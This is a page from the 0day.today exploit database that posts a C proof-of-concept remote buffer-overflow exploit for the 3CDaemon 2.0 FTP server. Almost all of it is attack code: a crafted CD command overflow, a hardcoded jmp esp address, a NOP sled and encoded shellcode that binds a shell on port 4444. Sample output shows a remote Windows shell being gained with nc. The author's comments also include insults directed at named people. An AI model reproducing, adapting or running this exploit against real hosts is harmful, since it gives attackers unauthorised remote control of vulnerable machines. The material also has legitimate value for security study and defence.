0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
3Com Ftp Server 2.0 Remote Overflow Exploit
=========================================== 3Com Ftp Server 2.0 Remote Overflow Exploit =========================================== /* Email fixed brotha /str0ke */ /* 3Com Ftp Server remote overflow exploit author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com package : 3CDaemon version 2.0 revision 10 advisory : http://secway.org/advisory/ad20041011.txt company address : 3com.com it is just a simple PoC tested on winxp sp 1 and may not work on other systems . just a lame coded software that didnt cost to bother myself to develop the exploit code . every command has got overflow . compiled with visual c++ 6 : cl 3com.c greetz : LorD and NT of Iran Hackers Sabotages , irc.zirc.org #ihs Jamie of exploitdev (hey man how should I thank u with ur helps?), sIiiS and vbehzadan of hyper-security , pishi , redhat , araz , simorgh securiteam , roberto of zone-h , milw0rm (dont u see that my mail address has changed?) Lamerz : shervin_kesafat@yahoo.com with a fucked ass ! , konkoor ( will be dead soon !! ) ashiyane digital lamerz team ( abroo har chi iranie bordin khak barsara ! ) /* /* D:\projects>3com.exe 127.0.0.1 21 c0d3r secret -------- 3Com Ftp Server remote exploit by c0d3r -------- [*] building overflow string [*] attacking host 127.0.0.1 [*] packet size = 673 byte [*] connected [*] sending username [*] sending password [*] exploit sent successfully try nc 127.0.0.1 4444 D:\projects>nc 127.0.0.1 4444 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\Program Files\3Com\3CDaemon> */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #define address 0x77A7EE6C // jmp esp lays in shell32.dll in my box #define size 673 // 3 byte command + 235 byte NOP junk + // 4 byte return address + 430 byte shellc0de int main (int argc, char *argv[]){ char shellc0de[] = // some NOPS + shellcode bind port 4444 "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\xEB\x10\x5A\x4A\x33\xC9\x66" "\xB9\x7D\x01\x80\x34\x0A\x99\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF" "\x70\x95\x98\x99\x99\xC3\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xD9\x91\x12\x41\x12\xEA\xA5\x12\xED\x87\xE1\x9A" "\x6A\x12\xE7\xB9\x9A\x62\x12\xD7\x8D\xAA\x74\xCF\xCE\xC8\x12\xA6" "\x9A\x62\x12\x6B\xF3\x97\xC0\x6A\x3F\xED\x91\xC0\xC6\x1A\x5E\x9D" "\xDC\x7B\x70\xC0\xC6\xC7\x12\x54\x12\xDF\xBD\x9A\x5A\x48\x78\x9A" "\x58\xAA\x50\xFF\x12\x91\x12\xDF\x85\x9A\x5A\x58\x78\x9B\x9A\x58" "\x12\x99\x9A\x5A\x12\x63\x12\x6E\x1A\x5F\x97\x12\x49\xF3\x9A\xC0" "\x71\x1E\x99\x99\x99\x1A\x5F\x94\xCB\xCF\x66\xCE\x65\xC3\x12\x41" "\xF3\x9C\xC0\x71\xED\x99\x99\x99\xC9\xC9\xC9\xC9\xF3\x98\xF3\x9B" "\x66\xCE\x75\x12\x41\x5E\x9E\x9B\x99\x9D\x4B\xAA\x59\x10\xDE\x9D" "\xF3\x89\xCE\xCA\x66\xCE\x69\xF3\x98\xCA\x66\xCE\x6D\xC9\xC9\xCA" "\x66\xCE\x61\x12\x49\x1A\x75\xDD\x12\x6D\xAA\x59\xF3\x89\xC0\x10" "\x9D\x17\x7B\x62\x10\xCF\xA1\x10\xCF\xA5\x10\xCF\xD9\xFF\x5E\xDF" "\xB5\x98\x98\x14\xDE\x89\xC9\xCF\xAA\x50\xC8\xC8\xC8\xF3\x98\xC8" "\xC8\x5E\xDE\xA5\xFA\xF4\xFD\x99\x14\xDE\xA5\xC9\xC8\x66\xCE\x79" "\xCB\x66\xCE\x65\xCA\x66\xCE\x65\xC9\x66\xCE\x7D\xAA\x59\x35\x1C" "\x59\xEC\x60\xC8\xCB\xCF\xCA\x66\x4B\xC3\xC0\x32\x7B\x77\xAA\x59" "\x5A\x71\x76\x67\x66\x66\xDE\xFC\xED\xC9\xEB\xF6\xFA\xD8\xFD\xFD" "\xEB\xFC\xEA\xEA\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC" "\xEA\xEA\xD8\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD\x99\xD5" "\xF6\xF8\xFD\xD5\xF0\xFB\xEB\xF8\xEB\xE0\xD8\x99\xEE\xEA\xAB\xC6" "\xAA\xAB\x99\xCE\xCA\xD8\xCA\xF6\xFA\xF2\xFC\xED\xD8\x99\xFB\xF0" "\xF7\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED" "\x99\xFA\xF5\xF6\xEA\xFC\xEA\xF6\xFA\xF2\xFC\xED\x99"; unsigned char *recvbuf,*user,*pass; unsigned int rc,addr,sock,rc2 ; struct sockaddr_in tcp; struct hostent *hp; WSADATA wsaData; char buffer[size]; unsigned short port; char *ptr; long *addr_ptr; int NOP_LEN = 200,i,x=0,f = 200; if(argc < 5) { printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n"); printf("-------- usage : 3com.exe host port user pass --------\n"); printf("-------- eg: 3com.exe 127.0.0.1 21 c0d3r secret --------\n\n"); exit(-1) ; } printf("\n-------- 3Com Ftp Server remote exploit by c0d3r --------\n\n"); recvbuf = malloc(256); memset(recvbuf,0,256); //Creating exploit code printf("[*] building overflow string"); memset(buffer,0,size); ptr = buffer; addr_ptr = (long *) ptr; for(i=0;i < size;i+=4){ *(addr_ptr++) = address; } buffer[0] = 'C';buffer[1] = 'D';buffer[2] = ' '; for(i = 3;i != 235;i++){ buffer[i] = 0x90; } i = 239; for(x = 0;x != strlen(shellc0de);x++,i++){ buffer[i] = shellc0de[x]; } buffer[size] = 0; //EO exploit code user = malloc(256); memset(user,0,256); pass = malloc(256); memset(pass,0,256); sprintf(user,"user %s\r\n",argv[3]); sprintf(pass,"pass %s\r\n",argv[4]); if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){ printf("[-] WSAStartup failed !\n"); exit(-1); } hp = gethostbyname(argv[1]); if (!hp){ addr = inet_addr(argv[1]); } if ((!hp) && (addr == INADDR_NONE) ){ printf("[-] unable to resolve %s\n",argv[1]); exit(-1); } sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); if (!sock){ printf("[-] socket() error...\n"); exit(-1); } if (hp != NULL) memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length); else tcp.sin_addr.s_addr = addr; if (hp) tcp.sin_family = hp->h_addrtype; else tcp.sin_family = AF_INET; port=atoi(argv[2]); tcp.sin_port=htons(port); printf("\n[*] attacking host %s\n" , argv[1]) ; Sleep(1000); printf("[*] packet size = %d byte\n" , sizeof(buffer)); rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in)); if(rc==0) { Sleep(1000) ; printf("[*] connected\n") ; rc2=recv(sock,recvbuf,256,0); printf("[*] sending username\n"); send(sock,user,strlen(user),0); send(sock,'\n',1,0); printf("[*] sending password\n"); Sleep(1000); send(sock,pass,strlen(pass),0); send(sock,buffer,strlen(buffer),0); send(sock,'\n',1,0); printf("[*] exploit sent successfully try nc %s 4444\n" , argv[1]); } else { printf("[-] 3CDaemon is not listening .... \n"); } shutdown(sock,1); closesocket(sock); } # 0day.today [2024-12-25] #